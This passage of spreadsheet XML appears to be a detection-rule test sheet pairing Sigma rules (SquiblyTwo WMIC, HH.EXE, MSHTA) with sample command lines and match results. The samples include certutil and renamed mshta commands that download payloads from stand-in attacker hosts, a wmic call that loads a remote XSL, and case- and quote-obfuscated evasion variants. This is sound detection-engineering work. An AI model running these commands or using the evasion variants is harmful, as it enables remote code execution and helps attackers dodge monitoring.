          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1546" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1546" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1546" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1546" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1546" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1546" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1546" s="36" t="n"/>
      <c r="J1546" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1546" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1547" ht="15.75" customHeight="1" s="42">
      <c r="A1547" s="36" t="n"/>
      <c r="B1547" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1547" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1547" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1547" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1547" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1547" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1547" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1547" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1548" ht="15.75" customHeight="1" s="42">
      <c r="A1548" s="36" t="n"/>
      <c r="B1548" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1548" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1548" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1548" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /"format:"\\AttackerServer\share\evil.xsl""</t>
        </is>
      </c>
      <c r="F1548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1548" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1548" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1548" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1548" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1549" ht="15.75" customHeight="1" s="42">
      <c r="A1549" s="36" t="n"/>
      <c r="B1549" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1549" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1549" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1549" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /foRmAt:"\\AtTAckErsErVeR\sharE\eVil.xSl"</t>
        </is>
      </c>
      <c r="F1549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1549" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1549" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1549" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1549" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1550" ht="15.75" customHeight="1" s="42">
      <c r="A1550" s="36" t="n"/>
      <c r="B1550" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1550" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1550" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1550" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FOrmAT:"\\aTtaCKerserVEr\shaRe\EVil.XSl"</t>
        </is>
      </c>
      <c r="F1550" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1550" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1550" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1550" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1550" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1550" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1551" ht="15.75" customHeight="1" s="42">
      <c r="A1551" s="36" t="n"/>
      <c r="B1551" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1551" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1551" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1551" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FoRMAt:"\\ATTAcKeRSerVER\shaRE\eVIl.xSL"</t>
        </is>
      </c>
      <c r="F1551" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1551" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1551" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1551" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1551" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1551" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1552" ht="15.75" customHeight="1" s="42">
      <c r="A1552" s="36" t="n"/>
      <c r="B1552" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1552" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1552" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1552" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe -"node:127.0.0.1" process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1552" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1552" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1552" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1552" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1552" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1552" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1553" ht="15.75" customHeight="1" s="42">
      <c r="A1553" s="36" t="n"/>
      <c r="B1553" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1553" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1553" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1553" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NoDE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1553" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1553" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1553" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1553" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1553" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1553" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1554" ht="15.75" customHeight="1" s="42">
      <c r="A1554" s="36" t="n"/>
      <c r="B1554" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1554" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1554" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1554" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NOdE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1554" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1554" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1554" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1554" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1554" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1554" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1555" ht="15.75" customHeight="1" s="42">
      <c r="A1555" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1555" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1555" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1555" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1555" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1555" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1555" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1555" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1555" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1555" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1555" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1556" ht="15.75" customHeight="1" s="42">
      <c r="A1556" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1556" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1556" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1556" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1556" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1556" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1556" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1556" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1556" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1556" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1556" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1557" ht="15.75" customHeight="1" s="42">
      <c r="A1557" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1557" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1557" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1557" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1557" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1557" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1557" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1557" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I155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57" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1557" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1558" ht="15.75" customHeight="1" s="42">
      <c r="A1558" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1558" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1558" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1558" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1558" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1558" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1558" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1558" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1558" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1558" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1558" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1559" ht="15.75" customHeight="1" s="42">
      <c r="A1559" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1559" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1559" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1559" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1559" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1559" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1559" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1559" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1559" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1559" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1559" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1560" ht="15.75" customHeight="1" s="42">
      <c r="A1560" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1560" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1560" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1560" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1560" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1560" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1560" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1560" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1560" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1560" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1560" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1561" ht="15.75" customHeight="1" s="42">
      <c r="A1561" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1561" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1561" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1561" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1561" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1561" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1561" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1561" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1561" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1561" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1561" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1562" ht="15.75" customHeight="1" s="42">
      <c r="A1562" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1562" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1562" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1562" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1562" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1562" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1562" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1562" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1562" s="36" t="n"/>
      <c r="J1562" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1562" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1563" ht="15.75" customHeight="1" s="42">
      <c r="A1563" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1563" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1563" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1563" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1563" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1563" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1563" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1563" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1563" s="36" t="n"/>
      <c r="J1563" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1563" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1564" ht="15.75" customHeight="1" s="42">
      <c r="A1564" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1564" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1564" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1564" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1564" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1564" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1564" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1564" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1564" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1564" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1564" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1565" ht="15.75" customHeight="1" s="42">
      <c r="A1565" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1565" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1565" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1565" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1565" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1565" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1565" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1565" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1565" s="36" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1565" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1565" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1566" ht="15.75" customHeight="1" s="42">
      <c r="A1566" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1566" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1566" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1566" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1566" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1566" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1566" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1566" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1566" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1567" ht="15.75" customHeight="1" s="42">
      <c r="A1567" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B1567" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1567" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1567" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1567" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1567" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I156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567" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1567" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1568" ht="15.75" customHeight="1" s="42">
      <c r="A1568" s="43" t="n"/>
      <c r="B1568" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C1568" s="36" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D1568" s="36" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E1568" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mshta.exe C:\Users\Public\Update.com &amp;&amp; C:\Users\Public\Update.com http://attacker.com/payload</t>
        </is>
      </c>
      <c r="F1568" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1568" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1568" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1568" s="4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1568" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1568" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1569" ht="15.75" customHeight="1" s="42">
      <c r="A1569" s="43" t="n"/>
      <c r="B1569" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C1569" s="36" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D1569" s="36" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E1569" s="36" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\script.hta"</t>
        </is>
      </c>
      <c r="F1569" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1569" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1569" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1569" s="43" t="inlineStr">
        <is>
          <t>Suspicious Mshta.EXE Execution Patterns (e32f92d1-523e-49c3-9374-bdb13b46a3ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J1569" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1569" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1570" ht="15.75" customHeight="1" s="42">
      <c r="A1570" s="43" t="n"/>
      <c r="B1570" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1570" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1570" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1570" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1570" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1570" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1570" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1570" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1571" ht="15.75" customHeight="1" s="42">
      <c r="A1571" s="43" t="n"/>
      <c r="B1571" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1571" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
